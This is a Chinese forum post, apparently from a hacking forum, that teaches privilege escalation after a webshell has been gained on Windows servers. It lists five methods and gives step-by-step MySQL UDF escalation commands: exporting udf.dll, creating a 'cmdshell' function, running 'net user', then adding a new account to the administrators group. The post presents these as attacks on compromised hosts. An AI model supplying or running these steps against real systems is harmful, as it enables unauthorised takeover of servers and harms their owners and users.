楼下回复扯淡的还有所谓的鉴定的,你懂多少?
今天来讲解拿到webshell后的提权,知己知彼方可搞定服务器安全
在2年前拿webshell很轻松,提权也很轻松
现在都很吃力,ftp密码搞的变态一坨坨的字符,所以你要千方百计的拿到webshell才是第一步
这里我拿一般都是通过现有的空间搞定,这个是以后要讲的事情了
以下情况假设你已经拿到webshell了
目前我所掌握的提权方法有以下几种
1.mysql提权
2.mssql提权
3.星外主机读取iis密码提权
4.seru提权
5.读取前人留下的后门
依次来说
首先,第一种mysql提权法是最有效的,我搞定的服务器基本都是用这个
第二种因为用的比较广泛,对他的防范方法也比较成熟了,不过这个也是很不错的方法
第三种星外主机提权法,这个有点鸡肋,如果肉鸡关闭列iis你基本就没有办法了,当然如果你知道iis是如何加密密码的,就会提高80%的破解率
第四种就更鸡肋了,现在都升级的很快了,不过还是有一些服务器是没有升级的,当然很少了
第五种,就得看运气了,我只碰到过一次
对于mysql,我个人真是又爱又恨,爱她在window平台下的权限非常OK,恨她是因为如果没有root密码,根本管理不了,这个和mssql不同.
mysql最常用的是udf提权,先用udf工具导出udf,看下图,这里需要mysql的足够权限才可以,最好是root
深入密码后提示连接成功,这里可以导出udf了,5.0以下版本可以随便导出,5.0以上只能导出到系统目录
c:\\windows\\udf.dll win2003
c:\\wint\\udf.dll win2000
一定要用'\\',因为系统会过滤掉一个
只有提示导出成功才算是成功一半了
然后输入create function cmdshell returns string soname 'udf.dll'即可
然后输入select cmdshell('net user')
如果能显示当前系统的用户信息,你就成功90%了
然后执行添加用户命令 net user 用户名 密码 /add即可
再执行 net localgroup administrators 用户名 /add就搞定了
在这里发贴太麻烦了,也许是因为我的级别比较低的原因,没办法上传图片,大家可以到
http://iofso.861g.com查看
[课程]Android-CTF解题方法汇总!